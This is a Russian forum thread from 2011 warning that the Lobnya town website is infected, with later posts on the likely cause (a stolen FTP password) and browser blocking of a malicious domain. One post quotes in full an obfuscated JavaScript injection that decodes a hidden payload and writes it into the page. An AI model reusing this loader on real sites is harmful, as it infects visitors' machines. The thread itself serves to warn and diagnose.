Распространяют вирус с городского сайта!

unexp · марта 05, 2011, 10:09:19

Как уже писал RazZar в теме «Новости г.Лобня», на городском сайте уже давно распространяется какой-то вирус malware.

Люди, ответственные за сайт пропустили это сообщение, поэтому дублирую в беседку, чтобы обратить на эту проблему внимание, в частности, ООО «ЛОБЕЛЕК ИС» (исходя и п.2 Правил форума).
До того, как они это не исправят, некоторые люди с антивирусами не могут получать информацию с официального сайта, а продолжить просмотр на свой страх и риск может стоить слишком дорого.

P.S. В помощь тем, кто будет разбираться (ведь это будет человек), немного подскажу. В конце выдаваемого html-документа после закрывающего тега </html> внедрен malware с таким кодом:

Цитировать<script type="text/javascript" language="javascript">wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939999399933933993393339933939399933933399939333933333399399933993999933999399399939933993933939993399399393393993339339939339399399333993933939993933399993393399939333933333399393333993933939933933399339333993393939939993339993993999993933999933339399993999339939993933399993393993993339933939339999933399993339939339399339933999339339933339399399393993393933933333399393393993393333999939339333933999393339933939399933393993393339939399339333933393333339993399399933933993339933999939339333933993933339993933399939333999333333999393339399993393999939933993399939993999333939993339399939993993393939933939399933933993399933993399339399933993339939939999339399933993339939933399339399993993333939933933339399933993939339993333399339993393339333999993339999333393999939939339399339933999339339933339399399393993393933999993";znanx=100;wdlgs=this;nsjvu="i"+"te";vurba=116;nqcs="wr"+nsjvu;for(gbcim in wdlgs){if(gbcim.length==8 && gbcim.charCodeAt(0)==znanx && gbcim.charCodeAt(7)==vurba){break;}}o="";imvuf=0;qpgsu=wdlgs[gbcim];ycamh=57;while (imvuf<wkllp.length){bnehf=0;for(mkrku=0;mkrku<8;mkrku++){bnehf=bnehf<<1;if(wkllp.charCodeAt(imvuf+mkrku)==ycamh){bnehf++;}}imvuf=imvuf+3;qpgsu[nqcs](String.fromCharCode(bnehf));imvuf=imvuf+5;}</script>

RazZar · марта 05, 2011, 10:10:45

http://forum.lobnya.ru/index.php?topic=46485.75

unexp · марта 05, 2011, 10:16:16

Добавлю, что этот вопрос разобран тут.
Причины появления и что делает этот вирус описаны.

garagul · марта 05, 2011, 10:49:15

Вообще-то я об этом еще раньше писал. Но, как известно, всем ...

http://forum.lobnya.ru/index.php?topic=46485.msg734837#msg734837

sandrianoff · марта 05, 2011, 13:30:29

А у меня чего-то он, того..., не открывается сейчас

видать запалили за распространение вредоносного ПО

unexp · марта 05, 2011, 13:43:18

Достаточно было убрать вредоносный яваскрипт-код, присунутый путем проникновения через фтп-клиент с сохраненным паролем на зараженном компьютере администратора, а они во как сделали.
Тоже вариант, теперь хоть вири не распространяют

RazZar · марта 05, 2011, 14:34:27

14:47 Хром все ругается на fwqqweerg3.co.cc

Больного видать не вылечить...

sandrianoff · марта 05, 2011, 19:27:51

19:41 всё ещё блокируется доступ в Хроме, на сайт не зайти, ау профессионалы

unexp · марта 07, 2011, 20:55:57